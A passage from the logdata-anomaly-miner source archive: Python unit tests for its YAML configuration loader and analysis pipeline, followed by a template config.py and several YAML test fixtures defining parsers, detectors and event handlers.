value_combo_det = context.registered_components[1][0] context.atomizer_factory.event_handler_list[0].stream = self.output_stream 
self.assertTrue(value_combo_det.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() def test21_suppress_output_no_id_error(self): """Check if an error is raised if no id parameter is defined.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/suppress_config.yml') aminer_config.yaml_data['Analysis'][0]['id'] = None aminer_config.yaml_data['Analysis'][0]['suppress'] = True context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test22_set_output_handlers(self): """Check if setting the output_event_handlers is working as expected.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/template_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() for index in context.registered_components: component = context.registered_components[index] if component[1] == 'EventTypeDetector': self.assertEqual(1, len(component[0].output_event_handlers)) self.assertEqual(StreamPrinterEventHandler, type(component[0].output_event_handlers[0])) else: self.assertEqual(None, component[0].output_event_handlers) def test23_check_functionality_of_validate_bigger_than_or_equal(self): """Check the functionality of the _validate_bigger_than_or_equal procedure.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) 
aminer_config.load_yaml('unit/data/configfiles/bigger_than_or_equal_valid.yml') self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/bigger_than_or_equal_error.yml') def test24_check_log_resource_list(self): """Check the functionality of the regex for LogResourceList..""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/wrong_log_resource_list.yml') def test25_check_mail_regex(self): """Check the functionality of the regex for MailAlerting.TargetAddress and MailAlerting.FromAddress.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/wrong_email.yml') with open('/usr/lib/logdata-anomaly-miner/aminer/schemas/BaseSchema.py', 'r') as sma: base_schema = eval(sma.read()) self.assertEqual(base_schema['MailAlerting.TargetAddress']['regex'], base_schema['MailAlerting.FromAddress']['regex']) target_address_regex = re.compile(base_schema['MailAlerting.TargetAddress']['regex']) valid_emails = ['john@example.com', 'john@example.co', 'root@localhost'] for email in valid_emails: self.assertEqual(target_address_regex.search(email).group(0), email, 'Failed regex check at %s.' % email) invalid_emails = ['john_at_example_dot_com', 'john@example.', '@example.com', ' @example.com'] for email in invalid_emails: self.assertEqual(target_address_regex.search(email), None, 'Failed regex check at %s.' 
% email) def test26_filter_config_errors(self): """Check if errors in multiple sections like Analysis, Parser and EventHandlers are found and filtered properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) try: aminer_config.load_yaml('unit/data/configfiles/filter_config_errors.yml') except ValueError as e: reg = re.compile( r"Config-Error: \{'AMinerGroup': \['unknown field'], 'Analysis': \[\{0: \['none or more than one rule validate', \{'oneof " r"definition [0-9]+': \[\{'learn_mode': \['unknown field'], 'reset_after_report_flag': \['unknown field'], 'type': \{'" r"allowed': \['ParserCount']}}]}]}], 'EventHandlers': \[\{1: \['none or more than one rule validate', \{'oneof definition " r"[0-9]+': \[\{'output_file_path': \['unknown field'], 'type': \{'allowed': \['SyslogWriterEventHandler']}}]}]}], 'Parser':" r" \[\{0: \['none or more than one rule validate', \{'oneof definition [0-9]+': \[\{'args2': \['unknown field'], 'type': \{" r"'forbidden': \['ElementValueBranchModelElement', 'DecimalIntegerValueModelElement', 'DecimalFloatValueModelElement', '" r"DateTimeModelElement', 'MultiLocaleDateTimeModelElement', 'DelimitedDataModelElement', 'JsonModelElement'," r" 'JsonStringModelElement']}}]}]}]}") self.assertIsNotNone(reg.match(str(e))) self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/filter_config_errors.yml') def test27_same_id_analysis(self): """Check if a ValueError is raised when the same id is used for multiple analysis components.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) try: aminer_config.load_yaml('unit/data/configfiles/same_id_analysis.yml') context = AnalysisContext(aminer_config) 
context.build_analysis_pipeline() except ValueError as e: msg = "Config-Error: The id \"NewMatchPathValueComboDetector\" occurred multiple times in Analysis!" self.assertEqual(msg, str(e)) context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test28_same_id_event_handlers(self): """Check if a ValueError is raised when the same id is used for multiple event handler components.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) try: aminer_config.load_yaml('unit/data/configfiles/same_id_event_handlers.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() except ValueError as e: msg = "Config-Error: The id \"handler\" occurred multiple times in EventHandlers!" self.assertEqual(msg, str(e)) context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test29_same_id_parser(self): """Check if a ValueError is raised when the same id is used for multiple parser components.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) try: aminer_config.load_yaml('unit/data/configfiles/same_id_parser.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() except ValueError as e: msg = "Config-Error: The id \"apacheModel\" occurred multiple times in Parser!" 
self.assertEqual(msg, str(e)) context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test30_parser_model_files(self): """Test if parser models from conf-enabled work properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/main.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() pm = context.atomizer_factory.parsing_model self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, [""]) self.assertTrue(isinstance(pm, FirstMatchModelElement)) # Sub1 self.assertTrue(isinstance(pm.children[0], SequenceModelElement)) self.assertTrue(isinstance(pm.children[0].children[0], FixedDataModelElement)) self.assertEqual(pm.children[0].children[0].element_id, "fix1") self.assertTrue(isinstance(pm.children[0].children[1], DecimalIntegerValueModelElement)) self.assertEqual(pm.children[0].children[1].element_id, "decimal1") # Sub2 self.assertTrue(isinstance(pm.children[1], SequenceModelElement)) self.assertTrue(isinstance(pm.children[1].children[0], DecimalIntegerValueModelElement)) self.assertEqual(pm.children[1].children[0].element_id, "decimal2") self.assertTrue(isinstance(pm.children[1].children[1], FixedDataModelElement)) self.assertEqual(pm.children[1].children[1].element_id, "fix2") self.assertTrue(isinstance(pm.children[1].children[2], DecimalFloatValueModelElement)) self.assertEqual(pm.children[1].children[2].element_id, "decimalFloat2") # Sub2 - Sub3 
self.assertTrue(isinstance(pm.children[1].children[3], FirstMatchModelElement)) self.assertTrue(isinstance(pm.children[1].children[3].children[0], SequenceModelElement)) self.assertTrue(isinstance(pm.children[1].children[3].children[0].children[0], FixedDataModelElement)) self.assertEqual(pm.children[1].children[3].children[0].children[0].element_id, "fix3") self.assertTrue(isinstance(pm.children[1].children[3].children[0].children[1], DecimalFloatValueModelElement)) self.assertEqual(pm.children[1].children[3].children[0].children[1].element_id, "decimalFloat3") self.assertTrue(isinstance(pm.children[1].children[3].children[1], AnyByteDataModelElement)) self.assertEqual(pm.children[1].children[3].children[1].element_id, "any3") # Sub3 self.assertTrue(isinstance(pm.children[2], FirstMatchModelElement)) self.assertTrue(isinstance(pm.children[2].children[0], SequenceModelElement)) self.assertTrue(isinstance(pm.children[2].children[0].children[0], FixedDataModelElement)) self.assertEqual(pm.children[2].children[0].children[0].element_id, "fix3") self.assertTrue(isinstance(pm.children[2].children[0].children[1], DecimalFloatValueModelElement)) self.assertEqual(pm.children[2].children[0].children[1].element_id, "decimalFloat3") self.assertTrue(isinstance(pm.children[2].children[1], AnyByteDataModelElement)) self.assertEqual(pm.children[2].children[1].element_id, "any3") # ApacheAccessModel self.assertEqual(pm.children[3].element_id, "accesslog") def test31_granular_log_resource_list(self): """Test if granular configs of the LogResourceList work properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/granular_log_resource_list.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() atomizer = 
context.atomizer_factory.get_atomizer_for_resource(b"file:///var/log/apache2/access.log") self.assertEqual(atomizer.parsing_model.element_id, "accesslog") self.assertFalse(atomizer.json_format) atomizer = context.atomizer_factory.get_atomizer_for_resource(b"unix:///var/lib/akafka/aminer.sock") self.assertEqual(atomizer.parsing_model.element_id, "model") self.assertTrue(isinstance(atomizer.parsing_model, SequenceModelElement)) self.assertTrue(atomizer.json_format) def test32_log_resource_ignore_list(self): """Test if analysis components can ignore log resources properly.""" class Object(object): pass t = time() a = Object() source_a = Object() setattr(a, "source", source_a) setattr(source_a, "resource_name", b"file:///tmp/syslog_a") b = Object() source_b = Object() setattr(b, "source", source_b) setattr(source_b, "resource_name", b"file:///tmp/syslog_b") fixed_dme_a = FixedDataModelElement('a', b'a') fixed_dme_b = FixedDataModelElement('b', b'b') match_context_a = MatchContext(b'a') match_element_a = fixed_dme_a.get_match_element("", match_context_a) log_atom1 = LogAtom(fixed_dme_a.fixed_data, ParserMatch(match_element_a), t, source_a) match_context_b = MatchContext(b'b') match_element_b = fixed_dme_b.get_match_element("", match_context_b) log_atom2 = LogAtom(fixed_dme_b.fixed_data, ParserMatch(match_element_b), t+1, source_b) nmpd1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, log_resource_ignore_list=["file:///tmp/syslog_b"]) self.analysis_context.register_component(nmpd1, "Detector1") nmpd2 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, log_resource_ignore_list=["file:///tmp/syslog_a"]) self.analysis_context.register_component(nmpd2, "Detector2") self.assertTrue(nmpd1.receive_atom(log_atom1)) self.assertFalse(nmpd1.receive_atom(log_atom2)) self.assertFalse(nmpd2.receive_atom(log_atom1)) self.assertTrue(nmpd2.receive_atom(log_atom2)) 
self.assertEqual(self.output_stream.getvalue(), datetime.fromtimestamp(t).strftime('%Y-%m-%d %H:%M:%S') + " New path(s) detected\nNewMatchPathDetector: \"Detector1\" (1 lines)\n /a: a\n['/a']\na\n\n" + datetime.fromtimestamp(t+1).strftime('%Y-%m-%d %H:%M:%S') + " New path(s) detected\nNewMatchPathDetector: \"Detector2\" (1 lines)\n /b: b\n['/b']\nb\n\n") self.reset_output_stream() def run_empty_components_tests(self, context): """Run the empty components tests.""" self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[1], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[3], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[4], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[5], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[6], DateTimeModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[7], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[8], FixedWordlistDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[9], FixedDataModelElement)) 
self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[10], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[11], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[12], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[13], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[14], DecimalIntegerValueModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[15], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[16], DecimalIntegerValueModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[17], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[18], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[19], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.element_id, 'accesslog') if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/__init__.py000066400000000000000000000000001500476301700247700ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/config.py000066400000000000000000000170061500476301700245140ustar00rootroot00000000000000# This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! 
Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analysis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relative to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of py in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # py will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'mail@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'mail@localhost' # Define which text should be prepended to the standard aminer # subject. 
Defaults to "py Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 10 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 # config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct py how to process incoming data streams to create log atoms from them. 
""" # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('Date', b'%d.%m.%Y %H:%M:%S'), FixedDataModelElement('UName', b' ubuntu '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HD Repair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('Disk Upgrade', service_children_disk_upgrade), SequenceModelElement('Home Path', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(None) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. 
from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [atom_filter], anomaly_event_handlers, default_timestamp_path_list=[''], use_real_time=True) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler atom_filter.add_handler(SimpleUnparsedAtomHandler(anomaly_event_handlers), stop_when_handled_flag=True) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name=None) atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/Home Path/Username', '/model/Home Path/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name=None) atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. 
from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name=None) anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/000077500000000000000000000000001500476301700251615ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/Sub1.yml000066400000000000000000000005761500476301700265260ustar00rootroot00000000000000Parser: - id: 'fix1' type: FixedDataModelElement name: 'fix1' args: 'fixed1string' - id: 'decimal1' type: DecimalIntegerValueModelElement name: 'decimal1' - id: 'seq1' type: SequenceModelElement start: True name: 'seq1' args: - fix1 - decimal1 logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/Sub2.yml000066400000000000000000000011321500476301700265140ustar00rootroot00000000000000Parser: - id: 'decimal2' type: DecimalIntegerValueModelElement name: 'decimal2' - id: 'fix2' type: FixedDataModelElement name: 'fix2' args: 'fixed2string' - id: 'decimalFloat2' type: DecimalFloatValueModelElement name: 'decimalFloat2' - id: 'sub3' type: Sub3 name: 'sub3' - id: 'seq2' type: SequenceModelElement start: True name: 'seq2' args: - decimal2 - fix2 - decimalFloat2 - sub3 logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/Sub3.yml000066400000000000000000000011541500476301700265210ustar00rootroot00000000000000Parser: - id: 'fix3' type: FixedDataModelElement name: 'fix3' args: 'fixed3string' - id: 'decimalFloat3' type: DecimalFloatValueModelElement name: 'decimalFloat3' - id: 'seq3' type: SequenceModelElement name: 'seq3' args: - fix3 - decimalFloat3 - id: 'any3' type: AnyByteDataModelElement name: 'any3' - id: 'first3' 
type: FirstMatchModelElement start: True name: 'first3' args: - seq3 - any3 logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/bigger_than_or_equal_error.yml000066400000000000000000000010771500476301700332620ustar00rootroot00000000000000LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'START' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: EventTypeDetector id: EventTypeDetector min_num_vals: 100 max_num_vals: 99 learn_mode: False logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/bigger_than_or_equal_valid.yml000066400000000000000000000013301500476301700332200ustar00rootroot00000000000000LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'START' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: EventTypeDetector id: EventTypeDetector1 min_num_vals: 100 max_num_vals: 200 learn_mode: False - type: EventTypeDetector id: EventTypeDetector2 min_num_vals: 100 max_num_vals: 100 learn_mode: False logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/double_parserstart_config.yml000066400000000000000000000026001500476301700331330ustar00rootroot00000000000000AminerUser: 'aminer' AminerGroup: 'aminer' LogResourceList: - 'file:///var/log/apache2/access.log' Core.PersistenceDir: '/tmp/lib/aminer' Parser: - id: 'apacheModel' start: True type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'firstModel' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector paths: 
["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: False learn_mode: True - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' # optional default: Default output_logline: False allow_missing_values: False # optional default: False - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: True EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler - id: syslog type: SyslogWriterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/filter_config_errors.yml000066400000000000000000000027241500476301700321170ustar00rootroot00000000000000AminerUser: 'aminer' AMinerGroup: 'aminer' # this attribute does not exist LogResourceList: - 'file:///var/log/apache2/access.log' RemoteControlSocket: '/var/run/aminer-remote.socket' Core.PersistenceDir: '/tmp/lib/aminer' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' args2: 'apache2' # this attribute does not exist - id: 'START' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False timestamp_paths: "/model/accesslog/time" Analysis: - type: ParserCount id: ParserCount paths: ["/model/accesslog/status"] report_interval: 10 reset_after_report_flag: False # this attribute does not exist learn_mode: True # this attribute does not exist - type: NewMatchPathValueComboDetector id: NewMatchPathValueComboDetector1 paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' output_logline: False allow_missing_values: False EventHandlers: - id: stpe type: StreamPrinterEventHandler output_file_path: '/tmp/streamPrinter.txt' - id: syslog type: SyslogWriterEventHandler output_file_path: '/tmp/streamPrinter.txt' # this attribute does not exist 
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/granular_log_resource_list.yml000066400000000000000000000011441500476301700333220ustar00rootroot00000000000000LogResourceList: - url: "file:///var/log/apache2/access.log" - url: "unix:///var/lib/akafka/aminer.sock" json: True parser_id: kafka_audit_logs Parser: - id: kafka_audit_logs type: AuditdParsingModel name: 'kafka' - id: ApacheAccessModel type: ApacheAccessModel name: 'ApacheAccessModel' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - ApacheAccessModel Input: timestamp_paths: "/accesslog/time" json_format: False EventHandlers: - id: stpe json: True type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/invalid_config.yml000066400000000000000000000034051500476301700306610ustar00rootroot00000000000000"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. 
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/invalid_schema.yml000066400000000000000000000026711500476301700306600ustar00rootroot00000000000000# This schema is invalid, because of the Some_Weird_Option key. Some_Weird_Option: "test" AminerUser: 'aminer' # optional default: aminer AminerGroup: 'aminer' # optional default: aminer LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'START' type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: False learn_mode: True - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' # optional default: Default output_logline: False allow_missing_values: False # optional default: False - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: True EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler - id: syslog type: SyslogWriterEventHandler 
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/json_config.yml000066400000000000000000000012001500476301700301730ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - host_name_model Input: timestamp_paths: "/accesslog/time" EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/configfiles/learnMode_config.yml000066400000000000000000000016751500476301700311500ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - host_name_model Input: timestamp_paths: "/accesslog/time" Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValueDetector paths: ["/accesslog/status"] learn_mode: True - 